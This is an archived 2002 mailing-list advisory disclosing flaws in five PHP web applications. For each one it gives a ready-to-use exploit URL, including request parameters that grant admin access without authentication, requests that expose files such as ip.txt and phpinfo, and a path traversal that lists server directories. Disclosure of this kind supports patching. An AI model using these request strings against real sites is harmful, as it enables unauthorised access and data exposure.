Security holes : Rose, EasyNews, User Online, Mon Album, KorWebLog

From: frog frog (leseulfrogat_private)
Date: Thu Jun 06 2002 - 08:14:02 PDT

  • Next message: quentynat_private: "Phone Switches + telephone banking etc"

    
     ('binary' encoding is not supported, stored as-is)
    Hello people :)
    
    Product 1 :
    ***********
    Rose
    http://www.jinxm.co.uk
    
    Version :
    4.52 
    
    Problem :
    - Admin access
    
    Exploit :
    - newsadmin/upload.php?userinfo[username]=hop&userinfo[userlevel]=100
    
    Product 2 :
    ***********
    EasyNews
    http://www.webrc.ca
    
    Version :
    4.3
    
    Problem :
    - Admin access
    
    Exploits :
    - admin.php?en_log_id=0&action=users
    - admin.php?en_log_id=0&action=config
    
    Product 3 :
    ***********
    User Online
    http://www.elpar.net
    
    Version :
    2.0
    
    Problem :
    - Informations recovery
    
    Exploit :
    - /ip.txt
    
    Product 4 :
    ***********
    Mon Album
    http://www.3dsrc.com
    
    Version :
    0.6.2d
    
    Problems :
    - Informations recovery
    - Admin access
    
    Exploits :
    - admin/admin_phpinfo.php4
    - admin.php4?reg_login=1
    
    Product 5 :
    ***********
    KorWebLog
    http://weblog.kldp.org/
    http://eunjea.sourceforge.net/
    
    Version :
    1.5.8
    
    Problems :
    - Path disclosure
    - HD's files listing
    
    Exploits :
    - viewimg.php?path=viewimg.php&form=1&var=1
    - viewimg.php?path=../../../path/to/list&form=1&var=1
    
    
    
    
    More details in french :
    http://www.ifrance.com/kitetoua/tuto/5holes7.txt
    
    Translated by google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
    2Fkitetoua%2Ftuto%2F5holes7.txt&langpair=fr%7Cen&hl=fr&prev=%
    2Flanguage_tools
    
    
    frog-m@n
    



    This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 09:32:26 PDT